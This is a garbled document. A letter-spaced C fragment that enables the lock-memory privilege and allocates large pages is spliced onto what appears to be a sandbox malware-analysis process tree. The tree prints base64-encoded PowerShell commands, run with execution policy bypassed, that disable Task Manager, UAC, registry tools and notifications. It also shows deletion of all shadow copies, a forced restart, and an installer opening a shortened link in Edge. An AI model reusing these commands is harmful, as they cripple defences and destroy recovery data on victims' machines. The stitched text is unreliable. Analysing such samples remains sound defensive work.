                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         L P W S T R   s t r s i d ; 
         C o n v e r t S i d T o S t r i n g S i d ( p T o k e n U s e r - > U s e r . S i d ,   & s t r s i d ) ; 
         a p p l o g ( L O G _ I N F O ,   " U s e r   S I D :   % S \ n " ,   s t r s i d ) ; 
 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         N T S T A T U S   s t a t u s ; 
         L S A _ H A N D L E   p o l i c y H a n d l e ; 
 
         i f   ( s t a t u s   =   O p e n P o l i c y ( N U L L ,   P O L I C Y _ C R E A T E _ A C C O U N T   |   P O L I C Y _ L O O K U P _ N A M E S ,   & p o l i c y H a n d l e ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         i f   ( s t a t u s   =   S e t P r i v i l e g e O n A c c o u n t ( p o l i c y H a n d l e ,   p T o k e n U s e r - > U s e r . S i d ,   S E _ L O C K _ M E M O R Y _ N A M E ,   T R U E ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P S e t P r i v i l e g e O n A c c o u n t o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         h T o k e n   =   N U L L ; 
         T O K E N _ P R I V I L E G E S   t p ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y   |   T O K E N _ A D J U S T _ P R I V I L E G E S ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   # 2   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         t p . P r i v i l e g e C o u n t   =   1 ; 
         t p . P r i v i l e g e s [ 0 ] . A t t r i b u t e s   =   S E _ P R I V I L E G E _ E N A B L E D ; 
 
         i f   ( ! L o o k u p P r i v i l e g e V a l u e ( N U L L ,   S E _ L O C K _ M E M O R Y _ N A M E ,   & t p . P r i v i l e g e s [ 0 ] . L u i d ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " L o o k u p P r i v i l e g e V a l u e   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         B O O L   r e s u l t   =   A d j u s t T o k e n P r i v i l e g e s ( h T o k e n ,   F A L S E ,   & t p ,   0 ,   ( P T O K E N _ P R I V I L E G E S ) N U L L ,   0 ) ; 
         D W O R D   e r r o r   =   G e t L a s t E r r o r ( ) ; 
 
         i f   ( ! r e s u l t   | |   ( e r r o r   ! =   E R R O R _ S U C C E S S ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " A d j u s t T o k e n P r i v i l e g e s   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   e r r o r ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         S I Z E _ T   p a g e S i z e   =   G e t L a r g e P a g e M i n i m u m ( ) ; 
 
         c h a r   * l a r g e B u f f e r   =   V i r t u a l A l l o c ( N U L L ,   p a g e S i z e   *   N _ P A G E S _ T O _ A L L O C ,   M E M _ R E S E R V E   |   M E M _ C O M M I T   |   M E M _ L A R G E _ P A G E S ,   P A G E _ R E A D W R I T E ) ; 
         i f   ( l a r g e B u f f e r ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " V i r t u a l A l l o c   f a i l e d ,   e r r o r   0 x % x " ,   G e t L a s t E r r o r ( ) ) ; 
         } 
 } 
                                                                                                                                    4⤵
                                                                                                                                      PID:1504
                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9407.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9404.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9405.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9406.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                    3⤵
                                                                                                                                      PID:1332
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAkAHAAYQBnAGUAZgBpAGwAZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACAALQBFAG4AYQBiAGwAZQBBAGwAbABQAHIAaQB2AGkAbABlAGcAZQBzAAoAJABwAGEAZwBlAGYAaQBsAGUALgBBAHUAdABvAG0AYQB0AGkAYwBNAGEAbgBhAGcAZQBkAFAAYQBnAGUAZgBpAGwAZQAgAD0AIAAkAGYAYQBsAHMAZQAKACQAcABhAGcAZQBmAGkAbABlAC4AcAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADIAMAA0ADgAMAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                                                                                                                        4⤵
                                                                                                                                          PID:5476
                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                            "C:\Windows\system32\chcp.com" 1252
                                                                                                                                            5⤵
                                                                                                                                              PID:2316
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss96CB.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi96C8.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr96C9.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr96CA.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                          3⤵
                                                                                                                                            PID:5352
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQA=
                                                                                                                                              4⤵
                                                                                                                                                PID:2992
                                                                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                  "C:\Windows\system32\chcp.com" 1252
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3660
                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA547.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA544.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA545.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA546.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                3⤵
                                                                                                                                                  PID:4208
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgB2AHMAcwBhAGQAbQBpAG4AIABkAGUAbABlAHQAZQAgAHMAaABhAGQAbwB3AHMAIAAvAGEAbABsACAALwBxAHUAaQBlAHQACgBUAGkAbQBlAG8AdQB0ACAALwBUACAANgAwAAoAUgBlAHMAdABhAHIAdAAtAEMAbwBtAHAAdQB0AGUAcgAgAC0ARgBvAHIAYwBlAA==
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5880
                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                        5⤵
                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                        PID:4896
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        "C:\Windows\system32\timeout.exe" /T 60
                                                                                                                                                        5⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:5876
                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                        "C:\Windows\system32\chcp.com" 1252
                                                                                                                                                        5⤵
                                                                                                                                                          PID:5660
                                                                                                                                                  • C:\Windows\Installer\MSI4CEE.tmp
                                                                                                                                                    "C:\Windows\Installer\MSI4CEE.tmp" https://rebrand.ly/7553b0
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4200
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rebrand.ly/7553b0
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1116
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1600
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4404
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1340
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:212
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4800
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4040
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5376
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:5400
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5840
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:5832
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6084
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6076
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5056 /prefetch:2
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3112
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
